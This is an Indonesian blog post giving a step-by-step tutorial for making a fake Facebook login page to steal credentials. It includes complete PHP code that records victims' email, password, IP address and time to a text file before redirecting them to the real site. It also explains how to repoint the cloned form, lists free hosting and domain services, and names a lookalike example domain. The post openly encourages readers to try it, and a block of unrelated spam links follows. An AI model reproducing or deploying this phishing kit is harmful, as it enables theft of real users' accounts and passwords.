Senin, 06 November 2017

Cara Membuat Fake Login Facebook - Phising


Fake Login merupakan sebuah cara pencurian password dimana sang penyerang melakukan sebuah Tindakan Hacking yang di sebut dengan "Phising" dengan cara membuat sebuah halaman login Palsu. Dimana nantinya jika ada korban yang mencoba login ke halaman Palsu tersebut maka email & password nya akan masuk ke dalam sebuah File berekstensi .txt. Dengan sedikit pengetahuan dasar pemograman PHP kita bisa membuat Fake Login hanya dalam waktu kurang dari 5 Menit saja.

Tahap pertama adalah kita harus mengambil source code halaman http://www.facebook.com. Caranya buka Situs Facebook dan tekan CTRL + U (Mozilla Firefox dan Google Chrome). Jika sudah mendapatkan Source Codenya, Copy semua Source Code dan Paste pada Notepad or Notepad++. Disini saya menggunakan Notepad++ agar kita mudah melakukan perubahan sedikit pada halaman Login Facebook tersebut. Jika sudah tekan CTRL + F untuk mempermudah melakukan pencarian source "Action" tanpa tanda petik. Sepert yang ada pada gambar dibawah ini:
Simpan File Tersebut dengan nama "index.html"

Pada bagian Action tersebut, nantinya kamu tinggal mengubah ke file untuk mengeksekusi Hasil dari Korban melakukan Login di halaman Palsu yang akan kita buat nantinya. Misalnya ke "log.php" tanpa tanda petik. Tugas kamu sekarang ada membuat Source Code halaman log.php untuk melakukan pencatatan email dan password yang nantinya akan masuk pada file berekstensi .txt. Source nya seperti ini:

<?php
$file = "
share.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
 
fwrite($handle, "+++++++++++++++++++++++++
+++++++++++++++++++++++++++"); 
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"
https://login.facebook.com/login.php?login_attempt=1\";
// -->
</script>";
?>

Seperti itu lah isi dari Source Code Halaman Log.php. Sepertinya saya tidak akan menjelaskan Fungsi dari setiap Line Source tersebut karena catatan ini bukan untuk menjelaskan bahasa Pemograman PHP. Sekarang liat pada Source yang saya tebalkan. Itu adalah file dimana nantinya email dan password dari korban akan tersimpan. Nah... kembali ke Source Code Halaman Login Facebook, Tadi pada bagian Source code:
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form">

Kamu tinggal ubah saja URL yang saya tebalkan dengan File php untuk mengeksekusi Email dan Pass. Maka nantinya akan seperti ini:

<form method="POST" action="
log.php" id="login_form">

Sekarang kamu tinggal buat 1 file lagi "share.txt".

Selanjutnya kamu tinggal Upload saja ke 3 File tersebut:
·  index.html
·  log.php
·  share.txt

Jika sudah siap semuanya. Sekarang kamu tinggal mencari Sebuah Free atau Premium Hosting untuk meyimpan ke 3 file anda. Dan juga Free Domain Diantaranya yang Free:

Hosting:
http://freehostia.com
http://000webhost.com
http://ripway.com
http://zymic.com
http://byethost.com
http://webs.com
Atau yang super duper lengkap dan Complete
 
http://www.google.co.id/search?hl=id&client=firefox-a&hs=7mX&rls=org.mozilla:en-US:official&q=free+web+host&start=0&sa=N&cts=1272799078717

Domain
http://co.cc
http://co.tv
http://co.nr
Atau menggunakan Free Sub Domain dari Free Hosting

Sebagai Contoh yang telah jadi
 http://faccebook.co.tv

Selamat Mencoba sobat Cyber Warriors👊

0 komentar:

Posting Komentar

www.lowongankerjababysitter.com www.lowongankerjapembanturumahtangga.com www.lowonganperawatlansia.com www.lowonganperawatlansia.com www.yayasanperawatlansia.com www.penyalurpembanturumahtanggaku.com www.bajubatikmodernku.com www.bestdaytradingstrategyy.com www.paketpernikahanmurahjakarta.com www.paketweddingorganizerjakarta.com www.undanganpernikahanunikmurah.com